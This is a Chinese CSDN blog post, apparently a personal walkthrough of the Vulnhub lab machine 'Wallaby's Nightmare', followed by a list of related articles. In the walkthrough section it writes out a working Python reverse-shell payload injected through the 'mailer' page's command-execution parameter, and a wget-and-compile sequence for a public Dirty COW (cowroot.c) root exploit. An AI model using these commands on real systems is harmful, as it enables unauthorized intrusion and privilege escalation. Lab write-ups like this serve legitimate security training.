Nightmare靶场渗透记录

最新推荐文章于 2024-07-19 08:49:21 发布
最新推荐文章于 2024-07-19 08:49:21 发布
阅读量139 收藏
点赞数
分类专栏: 靶场渗透攻略向 文章标签: 网络安全 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fffhhdd/article/details/128652182
版权

Nightmare靶场渗透记录

一、线索资料

image-20230110235317804

靶机ip:192.168.56.168

kali:192.168.56.128

二、日常扫端口

image-20230110235522928

80端口/22端口

先查看一波80

image-20230111000813627

首页让输入一个名字来开始CTF

image-20230111000912673

image-20230111000934019

似乎一切正常,点击start后,出现页面(吓一跳~)

上面提示:

这到底是什么?有个叫PuPPET的家伙想渗透我的服务器?失败者一定不知道我是伟大的瓦拉布!

让我们暂时观察一下他,也许我可以从他的行为中了解他。

发现我的渗透了?!

这个页面没什么信息可以收集了~

三、日常扫目录

image-20230111001354573

目录中除了js,jquey没什么,但是url 可以发现page参数,尝试page参数再扫一波

image-20230111001522810

果然有结果,发现很多,除了home,再看一下index和mailerimage-20230111001623958

不管输入什么都是连接失败…我靠~~~最后发现主页都进不去了,nmap再扫一下

image-20230111001739395

我靠这个老六把端口改了60080,怪不得一直进不去,重新访问一下

image-20230111002052957

翻译:

亲爱的莫莉,这家伙PuPPET想要我…很高兴我搬到了另一个港口,这样我可以更安全地工作!!!

我们都知道,默默无闻的安全是我们的出路。。。

访问index:

image-20230111002216180

是之前那个页面

访问mailer:

image-20230111002248001

又是一句话~ =。=|||

但是源代码中发现了线索:

image-20230111002332465

提示message goes here ,尝试了半天,发现shell命令可以在这里执行

image-20230111002813391

本地包含漏洞啊~LFI

四、反弹shell

瑞士军刀出场

image-20230111003014177

image-20230111004503938

翻译:

你怎么会这么明显地使用netcat。指挥官,这都在日志里。

反弹不回来,这货还来一句嘲讽…

msf尝试

(想说,今天的msf logo 真好看)

image-20230111005632321

搜索反弹shell

image-20230111005709267

(淦!死机了!)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HUHyvx9a-1673448372239)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20230111014000527.png)]

msf获取shell后,回车编程^M ,一直无法执行命令。搞了半天,一直死机。。。

攻略了下,换了种大佬的反弹shell的方式。用nc尝试连接

http://192.168.56.168:60080/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.56.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20230111022323908

python -c 'import pty; pty.spawn("/bin/bash")'
五、提权

image-20230111022521463

查看sudo -l 越权命令,没有可用

攻略后,需要再次使用脏牛提权,上次刚用过,直接下载到靶机

image-20230111023323317

image-20230111024059357

发现执行完脏牛后,卡在那里不动了,退出后靶机直接奔溃… 醉了真是

此处没有拿到root权限,暂没有想到办法…

攻略后,重新找了个脏牛提权文件

wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c

wget下载

image-20230111222946423

编译:

gcc cowroot.c -o exp -pthread

image-20230111223035763

image-20230111223304175

提权成功,可以在root目录下看到flag,但是却cat不出~~~~

PuPPET ER
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场,WALLABY‘S: NIGHTMARE (V1.0.2)
kukudeshuo的博客
12-03 3699
vulnhub靶场,WALLABY’S: NIGHTMARE (V1.0.2) 环境准备 靶机下载地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/ 攻击机:kali(192.168.109.128) 靶机:WALLABY’S: NIGHTMARE (V1.0.2)(192.168.109.187) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp
【甄选靶场】Vulnhub百个项目渗透——项目三十四:wallabysnightmare1.0.2(LFI,irc提权)
人间体佐菲的博客
10-07 683
【甄选靶场】Vulnhub百个项目渗透——项目三十四:wallabysnightmare1.0.2(LFI,irc提权)
Nightmare
u013497977的专栏
02-12 514
B - Nightmare Time Limit:1000MS     Memory Limit:32768KB     64bit IO Format:%I64d & %I64u Submit Status Practice HDU 1072 Description Ignatius had a nightmare last night. He found h
Navigation Nightmare(并查集)
weixin_43736492的博客
08-24 317
Navigation Nightmare Time Limit: 2000MS Memory Limit: 30000K Total Submissions: 8486 Accepted: 3053 Case Time Limit: 1000MS Description Farmer John’s pastoral neighborhood has N farms (2 <= N &lt...
nightmare1
03-26
标题“nightmare1”可能指的是一个项目、代码库或者是一个技术问题的代号,而描述中的同样内容“nightmare1”没有提供额外的信息。由于标签为空,我们无法直接获取特定的IT领域信息。不过,从文件名称“nightmare1-...
nightmare-phantomJS
04-29
《JavaScript中的Nightmare与PhantomJS:梦与幻影的结合》 在JavaScript的世界里,Nightmare和PhantomJS是两个强大的工具,它们为开发者提供了无头浏览器的解决方案,使得在Node.js环境中进行网页自动化和网页抓取...
Lydias-Nightmare
04-04
在"Lydias-Nightmare"项目中,我们可能会遇到`<header>`、`<nav>`、`<section>`、`<article>`、`<aside>`和`<footer>`这样的语义化标签,它们提供了更好的内容组织和可访问性。这些标签有助于搜索引擎理解页面内容,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 781
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
自建SMTP服务器:如何保障安全稳定的发信?
danplus的博客
07-17 445
自建SMTP服务器虽然可以提供更高的灵活性和控制力,但也需要投入大量的时间和精力来保障其安全和稳定。AokSend,指导您自建SMTP服务器,结合API接口,高效稳定,让邮件营销更加自主可控!
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 556
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 613
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
邮件安全篇:邮件端到端加密S/MIME
最新发布
sdexcel的专栏
07-19 845
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 821
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 869
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
HLS加密技术:保障流媒体内容安全的利器
jiamisoft的博客
07-17 954
HLS是一种由苹果公司提出的基于HTTP的流媒体网络传输协议,它允许将音视频文件编码为可播放的多媒体流,并通过HTTP协议进行传输。这种传输方式不仅具有广泛的网络适应性,还支持自适应比特率和分辨率,从而为用户提供流畅的观看体验。然而,HLS本身并不包含专门的加密方式,需要配合其他加密和防护措施来实现内容的安全传输。HLS加密技术的核心思想是将视频流分段,并对每个分段进行加密处理。在客户端播放时,需要先获取解密密钥才能正常播放。
nightmare unity
12-14
Nightmare Unity 是一个在线游戏社区,致力于为玩家提供一个共享恶梦和恐怖主题游戏的平台。在这个社区里,玩家可以分享自己的游戏经验、交流恶梦和恐怖游戏的心得,并且参与举办各种主题活动和比赛。 Nightmare ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值